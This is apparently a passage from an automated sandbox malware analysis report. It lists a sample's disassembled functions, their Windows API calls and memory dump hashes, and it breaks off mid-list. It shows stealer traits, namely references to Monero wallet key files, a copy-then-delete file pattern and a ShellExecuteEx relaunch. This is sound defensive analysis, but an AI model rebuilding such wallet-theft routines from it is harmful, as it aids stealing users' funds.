                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,00D9C048,00000000,00020119,?), ref: 00ED7E5E
                                • RegQueryValueExA.ADVAPI32(?,00DAD690,00000000,00000000,000000FF,000000FF), ref: 00ED7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00ED7E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction ID: 5268385cbab7b6c70f15a156a76aecaa4c50749789d7f306e1b3ecb5bc295736
                                • Opcode Fuzzy Hash: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction Fuzzy Hash: E71191B1E44309EBD714CF94E849FBBBBB8EB44701F10412AFA15A7284D7B459418BA0
                                Function 00ED9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(00DADE00,?,?,?,00ED140C,?,00DADE00,00000000), ref: 00ED926C
                                • lstrcpyn.KERNEL32(0110AB88,00DADE00,00DADE00,?,00ED140C,?,00DADE00), ref: 00ED9290
                                • lstrlen.KERNEL32(?,?,00ED140C,?,00DADE00), ref: 00ED92A7
                                • wsprintfA.USER32 ref: 00ED92C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 02c0a43c231dbfdd3e214b83df22eef2945b845c943741f53676ba73270af8af
                                • Instruction ID: d0b524e44cd906e87ae9155a34f3ed7df394ec8a11adcf42fbe2b4f591658a40
                                • Opcode Fuzzy Hash: 02c0a43c231dbfdd3e214b83df22eef2945b845c943741f53676ba73270af8af
                                • Instruction Fuzzy Hash: 2E010C75900208FFCB09DFECE984EAE7BB9EF44354F108548F9099B245C6B1AA80DB90
                                Function 00EC12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 286a92fd892f9a48d61915f8e23d1781799d93cdb0e121fd449c0fed4b7bd35c
                                • Instruction ID: 74e9d79871d32d4014e98ee9526800f8cdb3de1c2f0f8afa65317c6abc6db132
                                • Opcode Fuzzy Hash: 286a92fd892f9a48d61915f8e23d1781799d93cdb0e121fd449c0fed4b7bd35c
                                • Instruction Fuzzy Hash: B40131B9E40308BBDB14DFE0E849FAEB7B8EF48701F008169FA1597284D6B19A418F50
                                Function 00EDC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 15dd8c1b5906714953bdc2584a34200e7e0969e902c315bf50b40e7f200a6199
                                • Instruction ID: ce10ed22d2504350e903894f2b6163e09dc414cfea3450cb3819285097257692
                                • Opcode Fuzzy Hash: 15dd8c1b5906714953bdc2584a34200e7e0969e902c315bf50b40e7f200a6199
                                • Instruction Fuzzy Hash: 2A415AB110078C5EDB218B24CD94FFB7BECDF45348F2454E9E9CAA6282D2719A46DF60
                                Function 00ED6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00ED6663
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED6726
                                • ExitProcess.KERNEL32 ref: 00ED6755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: b74dd7682f37c4269f53047d18a3653b2cf843808b86292540acdd44d4ea4107
                                • Instruction ID: 909314bd54b1ba02b0b71445b3b8865de2c5a1069466442e4d12b4999067f349
                                • Opcode Fuzzy Hash: b74dd7682f37c4269f53047d18a3653b2cf843808b86292540acdd44d4ea4107
                                • Instruction Fuzzy Hash: 0A315CB1C00218AADB19EB90DC95BDD77B8EF44300F4061AAF21977281DFB46B89CF59
                                Function 00ED87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E28,00000000,?), ref: 00ED882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8836
                                • wsprintfA.USER32 ref: 00ED8850
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 53bfc8a282d79d79ded03fff078166cf34ce1054bdb442a9e5088a995773c64b
                                • Instruction ID: 0a0e85ebe6c3c94e34cacf0923c8b0ddeeb32636b7dd1a29fce024062247b81e
                                • Opcode Fuzzy Hash: 53bfc8a282d79d79ded03fff078166cf34ce1054bdb442a9e5088a995773c64b
                                • Instruction Fuzzy Hash: E12121B1E40308AFDB14DF94ED45FAEBBB8FB48711F104119F515A7284C7B999418BA0
                                Function 00ED8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00ED951E,00000000), ref: 00ED8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8D62
                                • wsprintfW.USER32 ref: 00ED8D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: b8b0b3e67c1305d2b76b62db1a497ef3cc71a7b0aa325f7b74b5b98991828ae5
                                • Instruction ID: 0857ac896f60b45ccfef596644b56022827b6fd9e38a5ff7aec10224574e516c
                                • Opcode Fuzzy Hash: b8b0b3e67c1305d2b76b62db1a497ef3cc71a7b0aa325f7b74b5b98991828ae5
                                • Instruction Fuzzy Hash: 66E08670E4030CBBC714DB94E809E5977B8EF04702F004065FD0997240D9B15E408B55
                                Function 00ECA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00ECA3FF
                                • lstrlen.KERNEL32(00000000), ref: 00ECA6BC
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 82f293d1953008b198c38096c6b88ded7da894732fa792440eb3c671f8f96f5f
                                • Instruction ID: 933f0ee14168822beb241504e4304776972b6c928c29e60ca4ea4ea69b6cb321
                                • Opcode Fuzzy Hash: 82f293d1953008b198c38096c6b88ded7da894732fa792440eb3c671f8f96f5f
                                • Instruction Fuzzy Hash: E1E16D76C101089ACB09FBA0EC96EEE7378EF54300F54917AF41672191EF706B4ADB66
                                Function 00ECD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD481
                                • lstrlen.KERNEL32(00000000), ref: 00ECD698
                                • lstrlen.KERNEL32(00000000), ref: 00ECD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 4795ef4502cd474cf59cca537609af1af35e5961f1ed17535edd7f4372ef2026
                                • Instruction ID: 212d79abbaf25b732d6050a2e06c77ab2a42da3895f5f725dceb634e003adf56
                                • Opcode Fuzzy Hash: 4795ef4502cd474cf59cca537609af1af35e5961f1ed17535edd7f4372ef2026
                                • Instruction Fuzzy Hash: 9D914F768101089ACB08FBA0DD96EEE7378EF54300F44517AF417B2291EF746B4ADB66
                                Function 00ECD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD801
                                • lstrlen.KERNEL32(00000000), ref: 00ECD99F
                                • lstrlen.KERNEL32(00000000), ref: 00ECD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
